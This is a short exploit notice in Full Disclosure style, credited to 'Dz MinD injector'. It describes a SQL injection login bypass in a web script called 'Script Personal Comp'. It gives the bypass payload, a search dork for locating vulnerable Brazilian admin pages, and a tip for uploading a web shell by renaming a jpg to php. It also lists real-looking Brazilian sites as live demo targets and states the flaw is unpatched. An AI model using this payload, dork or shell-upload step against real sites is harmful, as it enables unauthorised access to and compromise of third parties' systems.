# Exploit Script Personal Comp
## Full Disclosure
#Exploit Title : Script Personal Comp SQL Injection admin Authentication Bypass
#Exploit Author : Dz MinD injector
#Date : 02/12/2015
#Home : Algeria
#Home Fb : http://www.facebook.com/pokeme23
#Dork : inurl:admin/login.asp site:br
#Page Facebook : https://www.facebook.com/Hackers23Annaba
#Status : Not Patched
1. Description
Simple Injection With : admin' or 1=1#
I can help you to find script with : http://img11.hostingpics.net/pics/251869test.jpg
When you login you can upload your shell with tamper date jpg to php ^_^ in :
http://redemarcel.com.br/admin/geral.asp?link=lojas
2. Proof of Concept
http://localhost/admin/login.asp
user : admin
password: admin' or 1=1#
3.Demo:
http://redemarcXel.com.br/admin/login.asp
http://www.noXssosmoveis.com.br/admin/login.asp
http://dentalXprimer.com.br/admin/login.asp
# GreetZ ToO : Sige Dz - Dz Vatou - Kilwaa Dz - Theif Web & All Algeria HackerZ
# Free Palastine